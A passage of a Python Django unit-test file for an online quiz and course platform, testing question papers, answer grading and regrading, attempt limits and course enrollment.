self.course = Course.objects.get(name="Python Course")
self.user= User.objects.get(username='creator')
# All active questions
self.questions = Question.objects.filter(active=True, user=self.user)
self.quiz = Quiz.objects.get(description="demo quiz 1")
self.quiz_with_time_between_attempts = Quiz.objects.create(
description="demo quiz with time between attempts",
start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
duration=30, active=True,
attempts_allowed=3, time_between_attempts=1.0,
pass_criteria=0,
instructions="Demo Instructions"
)
# create question paper with only fixed questions
self.question_paper_fixed_questions = QuestionPaper.objects.create(
quiz=self.quiz)
self.question_paper_fixed_questions.fixed_questions.add(
self.questions.get(summary='Q11'), self.questions.get(summary='Q10'))
# create question paper with only random questions
self.question_paper_random_questions = QuestionPaper.objects.create(
quiz=self.quiz)
self.question_set_random = QuestionSet.objects.create(marks=2,
num_questions=2)
self.question_set_random.questions.add(self.questions.get(summary='Q13'),
self.questions.get(summary='Q5'), self.questions.get(summary='Q7'))
self.question_paper_random_questions.random_questions.add(
self.question_set_random)
# create question paper with no questions
self.question_paper_no_questions = QuestionPaper.objects.create(
quiz=self.quiz)
# create question paper
self.question_paper = QuestionPaper.objects.create(quiz=self.quiz,
total_marks=0.0,
shuffle_questions=True
)
self.question_paper_with_time_between_attempts = QuestionPaper.objects.create(
quiz=self.quiz_with_time_between_attempts,
total_marks=0.0,
shuffle_questions=True
)
self.question_paper.fixed_question_order = "{0}, {1}".format(
self.questions[3].id, self.questions[5].id
)
# add fixed set of questions to the question paper
self.question_paper.fixed_questions.add(self.questions[3],
self.questions[5]
)
# create two QuestionSet for random questions
# QuestionSet 1
self.question_set_1 = QuestionSet.objects.create(marks=2,
num_questions=2
)
# add pool of questions for random sampling
self.question_set_1.questions.add(self.questions[6],
self.questions[7],
self.questions[8],
self.questions[9]
)
# add question set 1 to random questions in Question Paper
self.question_paper.random_questions.add(self.question_set_1)
# QuestionSet 2
self.question_set_2 = QuestionSet.objects.create(marks=3,
num_questions=3
)
# add pool of questions
self.question_set_2.questions.add(self.questions[11],
self.questions[12],
self.questions[13],
self.questions[14]
)
# add question set 2
self.question_paper.random_questions.add(self.question_set_2)
# ip address for AnswerPaper
self.ip = '127.0.0.1'
self.user = User.objects.get(username="creator")
self.attempted_papers = AnswerPaper.objects.filter(
question_paper=self.question_paper,
user=self.user
)
# For Trial case
self.questions_list = [self.questions[3].id, self.questions[5].id]
self.trial_course = Course.objects.create_trial_course(self.user)
self.trial_quiz = Quiz.objects.create_trial_quiz(self.user)
def test_get_question_bank(self):
# Given
summaries = ['Q11', 'Q10']
questions = list(Question.objects.filter(summary__in=summaries))
# When
question_bank = self.question_paper_fixed_questions.get_question_bank()
# Then
self.assertSequenceEqual(questions, question_bank)
# Given
summaries = ['Q13','Q5','Q7']
questions = list(Question.objects.filter(summary__in=summaries))
# When
question_bank = self.question_paper_random_questions.get_question_bank()
# Then
self.assertSequenceEqual(questions, question_bank)
# Given
questions = []
# When
question_bank = self.question_paper_no_questions.get_question_bank()
# Then
self.assertSequenceEqual(questions, question_bank)
def test_questionpaper(self):
""" Test question paper"""
self.assertEqual(self.question_paper.quiz.description, 'demo quiz 1')
self.assertSequenceEqual(self.question_paper.fixed_questions.all(),
[self.questions[3], self.questions[5]]
)
self.assertTrue(self.question_paper.shuffle_questions)
def test_update_total_marks(self):
""" Test update_total_marks() method of Question Paper"""
self.assertEqual(self.question_paper.total_marks, 0)
self.question_paper.update_total_marks()
self.assertEqual(self.question_paper.total_marks, 15)
def test_get_random_questions(self):
""" Test get_random_questions() method of Question Paper"""
random_questions_set_1 = self.question_set_1.get_random_questions()
random_questions_set_2 = self.question_set_2.get_random_questions()
total_random_questions = len(random_questions_set_1 + \
random_questions_set_2)
self.assertEqual(total_random_questions, 5)
# To check whether random questions are from random_question_set
questions_set_1 = set(self.question_set_1.questions.all())
random_set_1 = set(random_questions_set_1)
random_set_2 = set(random_questions_set_2)
boolean = questions_set_1.intersection(random_set_1) == random_set_1
self.assertTrue(boolean)
self.assertEqual(len(random_set_1), 2)
# To check that the questions are random.
# If incase not random then check that the order is diferent
try:
self.assertFalse(random_set_1 == random_set_2)
except AssertionError:
self.assertTrue(random_questions_set_1 != random_questions_set_2)
def test_make_answerpaper(self):
""" Test make_answerpaper() method of Question Paper"""
already_attempted = self.attempted_papers.count()
attempt_num = already_attempted + 1
answerpaper = self.question_paper.make_answerpaper(self.user, self.ip,
attempt_num,
self.course.id)
self.assertIsInstance(answerpaper, AnswerPaper)
paper_questions = answerpaper.questions.all()
self.assertEqual(len(paper_questions), 7)
fixed_questions = set(self.question_paper.fixed_questions.all())
self.assertTrue(fixed_questions.issubset(set(paper_questions)))
answerpaper.passed = True
answerpaper.save()
# test can_attempt_now(self):
result = (False, u'You cannot attempt demo quiz 1 quiz more than 1 time(s)')
self.assertEquals(
self.question_paper.can_attempt_now(self.user, self.course.id), result
)
# trying to create an answerpaper with same parameters passed.
answerpaper2 = self.question_paper.make_answerpaper(self.user, self.ip,
attempt_num,
self.course.id)
# check if make_answerpaper returned an object instead of creating one.
self.assertEqual(answerpaper, answerpaper2)
def test_time_between_attempt(self):
""" Test make_answerpaper() method of Question Paper"""
already_attempted = self.attempted_papers.count()
attempt_num = 1
self.first_start_time = timezone.now()
self.first_end_time = self.first_start_time + timedelta(minutes=20)
self.second_start_time = self.first_start_time + timedelta(minutes=30)
self.second_end_time = self.second_start_time + timedelta(minutes=20)
# create answerpaper
self.first_answerpaper = AnswerPaper(
user=self.user,
question_paper=self.question_paper_with_time_between_attempts,
start_time=self.first_start_time,
end_time=self.first_end_time,
user_ip=self.ip,
course=self.course,
attempt_number=attempt_num
)
self.first_answerpaper.passed = True
self.first_answerpaper.save()
self.second_answerpaper = AnswerPaper(
user=self.user,
question_paper=self.question_paper_with_time_between_attempts,
start_time=self.second_start_time,
end_time=self.second_end_time,
user_ip=self.ip,
course=self.course,
attempt_number=attempt_num + 1
)
self.second_answerpaper.passed = True
self.second_answerpaper.save()
result = (False, u'You cannot start the next attempt for this quiz before 1.0 hour(s)')
self.assertEquals(
self.question_paper_with_time_between_attempts.can_attempt_now(self.user, self.course.id), result
)
def test_create_trial_paper_to_test_quiz(self):
qu_list = [str(self.questions_list[0]), str(self.questions_list[1])]
trial_paper = QuestionPaper.objects.create_trial_paper_to_test_quiz\
(self.trial_quiz,
self.quiz.id
)
trial_paper.random_questions.add(self.question_set_1)
trial_paper.random_questions.add(self.question_set_2)
trial_paper.fixed_question_order = ",".join(qu_list)
self.assertEqual(trial_paper.quiz, self.trial_quiz)
self.assertSequenceEqual(trial_paper.get_ordered_questions(),
self.question_paper.get_ordered_questions()
)
trial_paper_ran = [q_set.id for q_set in
trial_paper.random_questions.all()]
qp_ran = [q_set.id for q_set in
self.question_paper.random_questions.all()]
self.assertSequenceEqual(trial_paper_ran, qp_ran)
def test_create_trial_paper_to_test_questions(self):
qu_list = [str(self.questions_list[0]), str(self.questions_list[1])]
trial_paper = QuestionPaper.objects.\
create_trial_paper_to_test_questions(
self.trial_quiz, qu_list
)
self.assertEqual(trial_paper.quiz, self.trial_quiz)
fixed_q = self.question_paper.fixed_questions.values_list(
'id', flat=True)
self.assertSequenceEqual(self.questions_list, fixed_q)
def test_fixed_order_questions(self):
fixed_ques = self.question_paper.get_ordered_questions()
actual_ques = [self.questions[3], self.questions[5]]
self.assertSequenceEqual(fixed_ques, actual_ques)
###############################################################################
class AnswerPaperTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
self.course = Course.objects.get(name="Python Course")
self.ip = '101.0.0.1'
self.user = User.objects.get(username='creator')
self.user2 = User.objects.get(username='demo_user2')
self.profile = self.user.profile
self.quiz = Quiz.objects.get(description='demo quiz 1')
self.question_paper = QuestionPaper(quiz=self.quiz, total_marks=3)
self.question_paper.save()
self.quiz2 = Quiz.objects.get(description='demo quiz 2')
self.qtn_paper_with_single_question = QuestionPaper(
quiz=self.quiz2, total_marks=3
)
self.qtn_paper_with_single_question.save()
all_questions = Question.objects.filter(user=self.user).order_by("id")
self.questions = all_questions[0:3]
self.start_time = timezone.now()
self.end_time = self.start_time + timedelta(minutes=20)
self.question1 = all_questions[0]
self.question2 = all_questions[1]
self.question3 = all_questions[2]
self.question4 = all_questions[3]
# create answerpaper
self.answerpaper = AnswerPaper(user=self.user,
question_paper=self.question_paper,
start_time=self.start_time,
end_time=self.end_time,
user_ip=self.ip,
course=self.course
)
self.attempted_papers = AnswerPaper.objects.filter(
question_paper=self.question_paper,
user=self.user
)
self.question_paper.fixed_questions.add(*self.questions)
already_attempted = self.attempted_papers.count()
self.answerpaper.attempt_number = already_attempted + 1
self.answerpaper.save()
self.answerpaper.questions.add(*self.questions)
self.answerpaper.questions_order = ",".join(
[str(q.id) for q in self.questions]
)
self.answerpaper.questions_unanswered.add(*self.questions)
self.answerpaper.save()
# answers for the Answer Paper
self.answer_right = Answer(question=self.question1,
answer="Demo answer",
correct=True, marks=1,
error=json.dumps([])
)
self.answer_wrong = Answer(question=self.question2,
answer="My answer",
correct=False,
marks=0,
error=json.dumps(['error1', 'error2'])
)
self.answer_right.save()
self.answer_wrong.save()
self.answerpaper.answers.add(self.answer_right)
self.answerpaper.answers.add(self.answer_wrong)
self.answer1 = Answer.objects.create(
question=self.question1,
answer="answer1", correct=False, error=json.dumps([])
)
self.answerpaper.answers.add(self.answer1)
# create an answerpaper with only one question
self.answerpaper_single_question = AnswerPaper(user=self.user,
question_paper=self.question_paper,
start_time=self.start_time,
end_time=self.end_time,
user_ip=self.ip
)
self.attempted_papers = AnswerPaper.objects.filter(
question_paper=self.question_paper,
user=self.user
)
self.qtn_paper_with_single_question.fixed_questions.add(self.question4)
already_attempted = self.attempted_papers.count()
self.answerpaper_single_question.attempt_number = already_attempted + 1
self.answerpaper_single_question.save()
self.answerpaper_single_question.questions.add(self.question4)
self.answerpaper_single_question.questions_unanswered.add(self.question4)
self.answerpaper_single_question.save()
# answers for the Answer Paper
self.single_answer = Answer(question=self.question4,
answer="Demo answer",
correct=True, marks=1,
error=json.dumps([])
)
self.single_answer.save()
self.answerpaper_single_question.answers.add(self.single_answer)
self.question1.language = 'python'
self.question1.test_case_type = 'standardtestcase'
self.question1.summary = "Q1"
self.question1.save()
self.question2.language = 'python'
self.question2.type = 'mcq'
self.question2.test_case_type = 'mcqtestcase'
self.question2.summary = "Q2"
self.question2.save()
self.question3.language = 'python'
self.question3.type = 'mcc'
self.question3.test_case_type = 'mcqtestcase'
self.question3.summary = "Q3"
self.question3.save()
self.assertion_testcase = StandardTestCase(
question=self.question1,
test_case='assert add(1, 3) == 4',
type = 'standardtestcase'
)
self.assertion_testcase.save()
self.mcq_based_testcase = McqTestCase(
options = 'a',
question=self.question2,
correct = True,
type = 'mcqtestcase'
)
self.mcq_based_testcase.save()
self.mcc_based_testcase = McqTestCase(
question=self.question3,
options = 'a',
correct = True,
type = 'mcqtestcase'
)
self.mcc_based_testcase.save()
# Setup quiz where questions are shuffled
# Create Quiz and Question Paper
self.quiz2 = Quiz.objects.get(description="demo quiz 2")
self.question_paper2 = QuestionPaper(
quiz=self.quiz2, total_marks=3, shuffle_questions=True)
self.question_paper2.save()
summary_list = ['Q%d' % (i) for i in range(1, 21)]
self.que_list = Question.objects.filter(summary__in=summary_list)
self.question_paper2.fixed_questions.add(*self.que_list)
# Create AnswerPaper for user1 and user2
self.user1_answerpaper = self.question_paper2.make_answerpaper(
self.user, self.ip, 1, self.course.id
)
self.user2_answerpaper = self.question_paper2.make_answerpaper(
self.user2, self.ip, 1, self.course.id
)
self.user2_answerpaper2 = self.question_paper.make_answerpaper(
self.user2, self.ip, 1, self.course.id
)
settings.code_evaluators['python']['standardtestcase'] = \
"yaksh.python_assertion_evaluator.PythonAssertionEvaluator"
self.SERVER_POOL_PORT = 4000
server_pool = ServerPool(n=1, pool_port=self.SERVER_POOL_PORT)
self.server_pool = server_pool
self.server_thread = t = Thread(target=server_pool.run)
t.start()
@classmethod
def tearDownClass(self):
self.server_pool.stop()
self.server_thread.join()
settings.code_evaluators['python']['standardtestcase'] = \
"python_assertion_evaluator.PythonAssertionEvaluator"
def test_get_per_question_score(self):
# Given
question_id = self.question4.id
expected_score = 1
# When
score = self.answerpaper_single_question.get_per_question_score(question_id)
# Then
self.assertEqual(score, expected_score)
# Given
question_id = self.question2.id
expected_score = 0
# When
score = self.answerpaper.get_per_question_score(question_id)
# Then
self.assertEqual(score, expected_score)
# Given
question_id = 131
expected_score = 'NA'
# When
score = self.answerpaper.get_per_question_score(question_id)
# Then
self.assertEqual(score, expected_score)
def test_returned_question_is_not_none(self):
# Test add_completed_question and next_question
# When all questions are answered
# Before questions are answered
self.assertEqual(self.answerpaper_single_question.questions_left(), 1)
current_question = self.answerpaper_single_question.add_completed_question(
self.question4.id
)
# Then
self.assertEqual(
self.answerpaper_single_question.questions_answered.all()[0],
self.question4
)
self.assertEqual(self.answerpaper_single_question.questions_left(), 0)
self.assertIsNotNone(current_question)
self.assertEqual(current_question.summary, "Q4")
# When
next_question = self.answerpaper_single_question.next_question(
self.question4.id
)
# Then
self.assertEqual(self.answerpaper_single_question.questions_left(), 0)
self.assertIsNotNone(next_question)
self.assertEqual(next_question.summary, "Q4")
# When
current_question = self.answerpaper_single_question.get_current_question(
self.answerpaper_single_question.questions.all()
)
# Then
self.assertEqual(self.answerpaper_single_question.questions_left(), 0)
self.assertIsNotNone(current_question)
self.assertEqual(current_question.summary, "Q4")
def test_validate_and_regrade_mcc_correct_answer(self):
# Given
mcc_answer = [str(self.mcc_based_testcase.id)]
self.answer = Answer(question=self.question3,
answer=mcc_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(mcc_answer,
self.question3, json_data
)
# Then
self.assertTrue(result['success'])
self.assertEqual(result['error'], ['Correct answer'])
self.answer.correct = True
self.answer.marks = 1
# Given
self.answer.correct = True
self.answer.marks = 1
self.answer.answer = ['a', 'b']
self.answer.save()
# When
details = self.answerpaper.regrade(self.question3.id)
# Then
self.answer = self.answerpaper.answers.filter(
question=self.question3).last()
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_validate_and_regrade_code_correct_answer(self):
# Given
# Start code server
user_answer = dedent("""\
def add(a,b):
return a+b
""")
self.answer = Answer(question=self.question1,
answer=user_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
user = self.answerpaper.user
# When
json_data = self.question1.consolidate_answer_data(user_answer,
user
)
get_result = self.answerpaper.validate_answer(user_answer,
self.question1,
json_data,
self.answer.id,
self.SERVER_POOL_PORT
)
url = 'http://localhost:%s' % self.SERVER_POOL_PORT
check_result = get_result_from_code_server(url,get_result['uid'],
block=True
)
result = json.loads(check_result.get('result'))
# Then
self.assertTrue(result['success'])
self.answer.correct = True
self.answer.marks = 1
# Regrade
# Given
self.answer.correct = True
self.answer.marks = 1
self.answer.answer = dedent("""
def add(a,b):
return a-b
""")
self.answer.save()
# When
details = self.answerpaper.regrade(self.question1.id,
self.SERVER_POOL_PORT
)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_validate_and_regrade_mcq_correct_answer(self):
# Given
mcq_answer = str(self.mcq_based_testcase.id)
self.answer = Answer(question=self.question2,
answer=mcq_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(mcq_answer,
self.question2, json_data
)
# Then
self.assertTrue(result['success'])
self.answer.correct = True
self.answer.marks = 1
# Given
self.answer.correct = True
self.answer.marks = 1
self.answer.answer = 'b'
self.answer.save()
# When
details = self.answerpaper.regrade(self.question2.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question2).last()
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_mcq_incorrect_answer(self):
# Given
mcq_answer = 'b'
self.answer = Answer(question=self.question2,
answer=mcq_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(mcq_answer,
self.question2, json_data
)
# Then
self.assertFalse(result['success'])
def test_mcc_incorrect_answer(self):
# Given
mcc_answer = ['b']
self.answer = Answer(question=self.question3,
answer=mcc_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(mcc_answer,
self.question3, json_data
)
# Then
self.assertFalse(result['success'])
def test_answerpaper(self):
""" Test Answer Paper"""
self.assertEqual(self.answerpaper.user.username, 'creator')
self.assertEqual(self.answerpaper.user_ip, self.ip)
questions = [q.id for q in self.answerpaper.get_questions()]
num_questions = len(questions)
self.assertEqual(set(questions), set([q.id for q in self.questions]))
self.assertEqual(num_questions, 3)
self.assertEqual(self.answerpaper.question_paper, self.question_paper)
self.assertEqual(self.answerpaper.start_time, self.start_time)
self.assertEqual(self.answerpaper.status, 'inprogress')
def test_questions(self):
# Test questions_left() method of Answer Paper
self.assertEqual(self.answerpaper.questions_left(), 3)
# Test current_question() method of Answer Paper
current_question = self.answerpaper.current_question()
self.assertEqual(current_question.summary, "Q1")
# Test completed_question() method of Answer Paper
question = self.answerpaper.add_completed_question(self.question1.id)
self.assertIsNotNone(question)
self.assertEqual(self.answerpaper.questions_left(), 2)
# Test next_question() method of Answer Paper
current_question = self.answerpaper.current_question()
self.assertEqual(current_question.summary, "Q2")
# When
next_question_id = self.answerpaper.next_question(current_question.id)
# Then
self.assertTrue(next_question_id is not None)
self.assertEqual(next_question_id.summary, "Q3")
# Given, here question is already answered
current_question_id = self.question1.id
# When
next_question_id = self.answerpaper.next_question(current_question_id)
# Then
self.assertTrue(next_question_id is not None)
self.assertEqual(next_question_id.summary, "Q2")
# Given, wrong question id
current_question_id = 12
# When
next_question_id = self.answerpaper.next_question(current_question_id)
# Then
self.assertTrue(next_question_id is not None)
self.assertEqual(next_question_id.summary, "Q1")
# Given, last question in the list
current_question_id = self.question3.id
# When
next_question_id = self.answerpaper.next_question(current_question_id)
# Then
self.assertTrue(next_question_id is not None)
self.assertEqual(next_question_id.summary, "Q1")
# Test get_questions_answered() method
# When
questions_answered = self.answerpaper.get_questions_answered()
# Then
self.assertEqual(questions_answered.count(), 1)
self.assertSequenceEqual(questions_answered, [self.questions[0]])
# When
questions_unanswered = self.answerpaper.get_questions_unanswered()
# Then
self.assertEqual(questions_unanswered.count(), 2)
self.assertEqual(set([q.id for q in questions_unanswered]),
set([self.questions[1].id,
self.questions[2].id]
)
)
# Test completed_question and next_question
# When all questions are answered
current_question = self.answerpaper.add_completed_question(
self.question2.id
)
# Then
self.assertEqual(self.answerpaper.questions_left(), 1)
self.assertIsNotNone(current_question)
self.assertEqual(current_question.summary, "Q3")
# When
current_question = self.answerpaper.add_completed_question(
self.question3.id
)
# Then
self.assertEqual(self.answerpaper.questions_left(), 0)
self.assertIsNotNone(current_question)
self.assertTrue(current_question == self.answerpaper.get_all_ordered_questions()[0])
# When
next_question_id = self.answerpaper.next_question(current_question_id)
# Then
all_questions = self.questions.all()
self.assertTrue(next_question_id == all_questions[0])
def test_update_marks(self):
""" Test update_marks method of AnswerPaper"""
self.answerpaper.update_marks('inprogress')
self.assertEqual(self.answerpaper.status, 'inprogress')
self.assertTrue(self.answerpaper.is_attempt_inprogress())
self.answerpaper.update_marks()
self.assertEqual(self.answerpaper.status, 'completed')
self.assertEqual(self.answerpaper.marks_obtained, 1.0)
self.assertEqual(self.answerpaper.percent, 33.33)
self.assertTrue(self.answerpaper.passed)
self.assertFalse(self.answerpaper.is_attempt_inprogress())
def test_set_end_time(self):
current_time = timezone.now()
self.answerpaper.set_end_time(current_time)
self.assertEqual(self.answerpaper.end_time,current_time)
def test_get_question_answer(self):
""" Test get_question_answer() method of Answer Paper"""
questions = self.answerpaper.questions.all()
answered = self.answerpaper.get_question_answers()
for question in questions:
answers_saved = Answer.objects.filter(question=question)
error_list = [json.loads(ans.error) for ans in answers_saved]
if answers_saved:
self.assertEqual(len(answered[question]), len(answers_saved))
ans = []
err = []
for val in answered[question]:
ans.append(val.get('answer'))
err.append(val.get('error_list'))
self.assertEqual(set(ans), set(answers_saved))
self.assertEqual(error_list, err)
def test_is_answer_correct(self):
self.assertTrue(self.answerpaper.is_answer_correct(self.questions[0]))
self.assertFalse(self.answerpaper.is_answer_correct(self.questions[1]))
def test_get_previous_answers(self):
answers = self.answerpaper.get_previous_answers(self.questions[0])
self.assertEqual(answers.count(), 2)
self.assertTrue(answers[0], self.answer_right)
answers = self.answerpaper.get_previous_answers(self.questions[1])
self.assertEqual(answers.count(), 1)
self.assertTrue(answers[0], self.answer_wrong)
def test_set_marks(self):
self.answer_wrong.set_marks(0.5)
self.assertEqual(self.answer_wrong.marks, 0.5)
self.answer_wrong.set_marks(10.0)
self.assertEqual(self.answer_wrong.marks, 1.0)
def test_get_latest_answer(self):
latest_answer = self.answerpaper.get_latest_answer(self.question1.id)
self.assertEqual(latest_answer.id, self.answer1.id)
self.assertEqual(latest_answer.answer, "answer1")
def test_shuffle_questions(self):
ques_set_1 = self.user1_answerpaper.get_all_ordered_questions()
ques_set_2 = self.user2_answerpaper.get_all_ordered_questions()
self.assertFalse(ques_set_1 == ques_set_2)
def test_validate_current_question(self):
self.user2_answerpaper2.questions_unanswered.remove(*self.questions)
self.assertEqual(self.user2_answerpaper2.current_question(),
self.question1)
def test_duplicate_attempt_answerpaper(self):
with self.assertRaises(IntegrityError):
new_answerpaper = AnswerPaper.objects.create(
user=self.answerpaper.user,
question_paper=self.answerpaper.question_paper,
attempt_number=self.answerpaper.attempt_number,
start_time=self.answerpaper.start_time,
end_time=self.answerpaper.end_time,
course=self.answerpaper.course
)
###############################################################################
class CourseTestCases(unittest.TestCase):
def setUp(self):
self.course = Course.objects.get(name="Python Course")
self.creator = User.objects.get(username="creator")
self.template_course_user = User.objects.get(username="demo_user4")
self.student = User.objects.get(username="course_user")
self.student1 = User.objects.get(username="demo_user2")
self.student2 = User.objects.get(username="demo_user3")
self.quiz1 = Quiz.objects.get(description='demo quiz 1')
self.quiz2 = Quiz.objects.get(description='demo quiz 2')
self.questions = Question.objects.filter(active=True,
user=self.creator
)
self.modules = LearningModule.objects.filter(creator=self.creator)
# create courses with disabled enrollment
self.enroll_request_course = Course.objects.create(
name="Enrollment Request Course With Enrollment Disabled",
enrollment="Enroll Request",
creator=self.creator,
start_enroll_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
end_enroll_time=datetime(2015, 11, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
)
self.open_course = Course.objects.create(
name="Open Course With Enrollment Disabled",
enrollment="Open Course",
creator=self.creator,
start_enroll_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
end_enroll_time=datetime(2015, 11, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
)
# create a course that will be cloned
self.template_course = Course.objects.create(
name="Template Course to clone",
enrollment="Open Course",
creator=self.creator,
start_enroll_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
end_enroll_time=datetime(2015, 11, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
)
self.template_quiz = Quiz.objects.create(
start_date_time=datetime(2014, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
end_date_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
duration=30,
active=False,
attempts_allowed=-1,
time_between_attempts=0,
description='template quiz 1',
pass_criteria=40,
instructions="Demo Instructions"
)
self.template_question_paper = QuestionPaper.objects.create(
quiz=self.template_quiz,
total_marks=0.0,
shuffle_questions=True
)
self.template_question_paper.fixed_questions.add(self.questions[1],
self.questions[2],
self.questions[3]
)
self.template_quiz2 = Quiz.objects.create(
start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
duration=30,
active=True,
attempts_allowed=1,
time_between_attempts=0,
pass_criteria=0,
instructions="Demo Instructions"
)
self.template_question_paper2 = QuestionPaper.objects.create(
quiz=self.template_quiz2,
total_marks=0.0,
shuffle_questions=True
)
self.template_question_paper2.fixed_questions.add(self.questions[1],
self.questions[2],
self.questions[3]
)
def test_get_learning_modules(self):
# Given
modules = list(self.modules)
# When
course_modules = self.course.get_learning_modules()
# Then
self.assertSequenceEqual(list(course_modules), modules)
# Given
modules = list(self.modules.filter(name='LM1'))
module_to_remove = self.modules.get(name='LM2')
# When
self.course.learning_module.remove(module_to_remove)
course_modules = self.course.get_learning_modules()
# Then
self.assertSequenceEqual(list(course_modules), modules)
def test_get_quizzes(self):
# Given
quizzes = [self.quiz1]
# When
course_quizzes = self.course.get_quizzes()
# Then
self.assertSequenceEqual(course_quizzes, quizzes)
def test_get_learning_units(self):
# Given
lesson = Lesson.objects.get(name='L1')
self.learning_unit_one = LearningUnit.objects.get(order=1,
lesson=lesson)
self.learning_unit_two = LearningUnit.objects.get(order=2,
quiz=self.quiz1)
learning_units = [self.learning_unit_one, self.learning_unit_two]
# When
course_learning_units = self.course.get_learning_units()
# Then
self.assertSequenceEqual(course_learning_units, learning_units)
def test_is_creator(self):
""" Test is_creator method of Course"""
self.assertTrue(self.course.is_creator(self.creator))
def test_is_self_enroll(self):
""" Test is_self_enroll method of Course"""
self.assertFalse(self.course.is_self_enroll())
def test_deactivate(self):
""" Test deactivate method of Course"""
self.course.deactivate()
self.assertFalse(self.course.active)
def test_activate(self):
""" Test activate method of Course"""
self.course.activate()
self.assertTrue(self.course.active)
def test_request(self):
""" Test request and get_requests methods of Course"""
self.course.request(self.student1, self.student2)
self.assertSequenceEqual(self.course.get_requests(),
[self.student1, self.student2])
def test_enroll_reject(self):
""" Test enroll, reject, get_enrolled and get_rejected methods"""
self.assertSequenceEqual(self.course.get_enrolled(), [self.student])
was_rejected = False
self.course.enroll(was_rejected, self.student1)
self.assertSequenceEqual(self.course.get_enrolled(),
[self.student1, self.student])
self.assertSequenceEqual(self.course.get_rejected(), [])
was_enrolled = False
self.course.reject(was_enrolled, self.student2)
self.assertSequenceEqual(self.course.get_rejected(), [self.student2])
was_rejected = True
self.course.enroll(was_rejected, self.student2)
self.assertSequenceEqual(self.course.get_enrolled(),
[self.student1, self.student2, self.student])
self.assertSequenceEqual(self.course.get_rejected(), [])
was_enrolled = True
self.course.reject(was_enrolled, self.student2)
self.assertSequenceEqual(self.course.get_rejected(), [self.student2])
self.assertSequenceEqual(self.course.get_enrolled(),
[self.student1, self.student])
self.assertTrue(self.course.is_enrolled(self.student1))
def test_add_teachers(self):
""" Test to add teachers to a course"""
self.course.add_teachers(self.student1, self.student2)
self.assertSequenceEqual(self.course.get_teachers(),
[self.student1, self.student2])
def test_remove_teachers(self):
""" Test to remove teachers from a course"""
self.course.add_teachers(self.student1, self.student2)
self.course.remove_teachers(self.student1)
self.assertSequenceEqual(self.course.get_teachers(), [self.student2])
def test_is_teacher(self):
""" Test to check if user is teacher"""
self.course.add_teachers(self.student2)
result = self.course.is_teacher(self.student2)
self.assertTrue(result)
def test_create_trial_course(self):
"""Test to check if trial course is created"""
trial_course = Course.objects.create_trial_course(self.creator)
self.assertEqual(trial_course.name, "trial_course")
self.assertEqual(trial_course.enrollment, "open")
self.assertTrue(trial_course.active)
self.assertEqual(self.creator, trial_course.creator)
self.assertIn(self.creator, trial_course.students.all())
self.assertTrue(trial_course.is_trial)
def test_enabled_enrollment_for_course(self):
"""Test to check enrollment is closed for open course"""
self.assertTrue(self.course.is_active_enrollment())
def test_disabled_enrollment_for_open_course(self):
"""Test to check enrollment is closed for open course"""
self.assertFalse(self.open_course.is_active_enrollment())
def test_disabled_enrollment_for_enroll_request_course(self):
"""Test to check enrollment is closed for open course"""
self.assertFalse(self.enroll_request_course.is_active_enrollment())
def test_course_complete_percent(self):
# for course with no modules
self.no_module_course = Course.objects.create(
name="test_course", creator=self.creator, enrollment="open")
percent = self.course.percent_completed(self.student1)
self.assertEqual(percent, 0)
# for course with module but zero percent completed
percent = self.course.percent_completed(self.student1)
self.assertEqual(percent, 0)
# Add completed unit to course status and check percent
lesson = Lesson.objects.get(name='L1')
self.completed_unit = LearningUnit.objects.get(lesson=lesson)
course_status = CourseStatus.objects.create(
course=self.course, user=self.student1)
course_status.completed_units.add(self.completed_unit)
updated_percent = self.course.percent_completed(self.student1)
self.assertEqual(updated_percent, 25)
def test_course_time_remaining_to_start(self):
# check if course has 0 days left to start
self.assertEqual(self.course.days_before_start(), 0)
# check if course has some days left to start
course_time = self.course.start_enroll_time
self.course.start_enroll_time = datetime(
2199, 12, 31, 10, 8, 15, 0,
tzinfo=pytz.utc
)
self.course.save()
updated_course = Course.objects.get(id=self.course.id)
time_diff = updated_course.start_enroll_time - timezone.now()
actual_days = time_diff.days + 1
self.assertEqual(updated_course.days_before_start(), actual_days)
self.course.start_enroll_time = course_time
self.course.save()
###############################################################################
class TestCaseTestCases(unittest.TestCase):
def setUp(self):
self.user = User.objects.get(username="creator")
self.question1 = Question(summary='Demo question 1',
language='Python',
type='Code',
active=True,
description='Write a function',
points=1.0,
user=self.user,
snippet='def myfunc()'
)
self.question2 = Question(summary='Demo question 2',
language='Python',
type='Code',
active=True,
description='Write to standard output',
points=1.0,
user=self.user,
snippet='def myfunc()'
)
self.question1.save()
self.question2.save()
self.assertion_testcase = StandardTestCase(
question=self.question1,
test_case='assert myfunc(12, 13) == 15',
type='standardtestcase'
)
